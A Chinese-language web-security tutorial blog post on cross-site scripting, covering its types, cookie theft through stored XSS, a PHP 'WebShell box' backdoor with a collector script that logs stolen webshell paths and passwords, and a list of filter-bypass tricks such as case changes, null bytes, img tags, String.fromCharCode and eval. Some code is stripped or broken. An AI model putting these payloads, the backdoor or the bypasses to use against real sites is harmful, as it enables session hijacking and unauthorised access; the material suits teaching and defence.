渗透之路基础 -- 跨站脚本攻击XSS

文章目录

  • 漏洞原理及防御
  • XSS 原理分析:输出问题导致js代码被识别执行
  • XSS 技术分类
  • Cookie盗取
  • 基于Xss的WebShell箱子的攻击
    • XSS相关防护过滤及绕过分析(参考链接)
    • 防护:
    • 绕过:
  • 实战知识点

漏洞原理及防御

XSS又叫CSS (CrossSiteScript),因为与层叠样式表(css)重名,所以叫Xss,中文名叫跨站脚本攻击。

xss攻击,主要就是攻击者通过“html注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击方式。

危害

  • 可以盗取用户Cookie

  • 挂马(水坑攻击)

    在用户经常访问的网站,利用网站的漏洞植入攻击代码,访问者终端会被植入恶意程序或者直接盗取信息

  • 蠕虫(需要结合CSRF)

  • 局限性的键盘记录

防御

  1. 特殊字符HTML实体转码。最好的过滤方式是在输出和二次调用的时候进行加HTML实体一类的转码,防止脚本注入。
  2. 标签事件属性黑名单。特殊字符容易被绕过,所以还得加标签事件得黑名单或者白名单,这里推荐使用白名单的方式,实现规则可以直接使用正则表达式来匹配,如果匹配到的事件不在白名单列表,就可以直接拦截,而不是过滤为空。

XSS 原理分析:输出问题导致js代码被识别执行

​ 漏洞产生:输出问题

渗透之路基础 -- 跨站脚本攻击XSS_第1张图片

渗透之路基础 -- 跨站脚本攻击XSS_第2张图片

又返回结果1,如果注入脚本代码

渗透之路基础 -- 跨站脚本攻击XSS_第3张图片

这就是一个简单的反射型xss

XSS 技术分类

  • 反射性跨站(非持续型)

    经过服务器,没有和数据库有交集

  • 存储型跨站(持续型)

    是直接写入数据库,保持持久性,经过服务器

  • DOM XSS

    效果上说也是反射型XSS,但是这种XSS完全存在于客户端,不会经过服务器,直接和js拼接输出到页面

Cookie盗取

利用原理

​ 通过在评论区插入存储型XSS脚本,每次用户访问都会加载评论中的恶意脚本,导致本地cookie被发送到攻击者平台

​ 拿到webshell后,修改登录成功后的页面,插入xss获取cookie的脚本代码

XSS平台

// 页面底植入xss代码
<script src=""></script> // xss平台中的脚本

基于Xss的WebShell箱子的攻击

​ 通过在网站后台植入Xss代码将获取到的信息发送到渗透的网站中

help.php (后门)

 
	// 正常的大马程序
    // 植入Xss
    $url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; // 百度查找相应的代码
	// 输出获取到的大马路径和密码,发送到自己的渗透网站中,url值可以相应修改为xss跨站获取cookie的代码
	echo ""
?>

index.php (接受传来的信息)


	$url=$_GET['u'];
	$pass=$_GET['p'];
	// 可以修改为写入数据库操作
	$file=fopen('webshell.html','a+');
	fwrite($file,$url);
	fwrite($file,"
"
); fwrite($file,$pass); fwrite($file,"
"
); fclose($file); ?>

模拟

​ 假设这是某黑客A上传的 带有黑客B植入的后门代码的大马,会将大马的消息发送到黑客B的WebShell箱子中

黑客B接收的盒子信息

渗透之路基础 -- 跨站脚本攻击XSS_第4张图片

渗透之路基础 -- 跨站脚本攻击XSS_第5张图片

这就是WebShell盒子入侵事件

如果将xss代码改为获取cookie就可以获取到权限

渗透之路基础 -- 跨站脚本攻击XSS_第6张图片

XSS相关防护过滤及绕过分析(参考链接)

https://www.freebuf.com/articles/web/153055.html

https://www.secpulse.com/archives/57411.html

防护:

  1. 关键字过滤
  2. 特殊符号过滤
  3. 字符串长度过滤
  4. 转义编码防护

绕过:

  1. 改变大小写

  2. 使用空白符

    1. %00
  3. Hex编码

  4. 其他标签调用

    1. < img src=“javascript:alert(1);”>
    2. 利用图片标签,找不到图片,出错执行代码
  5. Js自带函数

    1. String.fromCharCode(88,83,83) 转换ACSII码转换成字符

    2. 绕过 alert(1) 被过滤

      用eval函数执行,其中需要转换编码格式

      将 alert 转换Unicode编码

      渗透之路基础 -- 跨站脚本攻击XSS_第7张图片

实战知识点

  1. 通过闭合标签

    首先闭合 无效

    渗透之路基础 -- 跨站脚本攻击XSS_第8张图片

    尝试再闭合上一层

    渗透之路基础 -- 跨站脚本攻击XSS_第9张图片

    可以弹窗

  2. 大小写绕过

  3. 双写绕过

  4. 换注入标签

  5. 添加定位符 #

渗透之路基础 -- 跨站脚本攻击XSS_第10张图片

渗透之路基础 -- 跨站脚本攻击XSS_第11张图片

你可能感兴趣的:(技术篇,XSS,渗透测试,web安全,网络安全)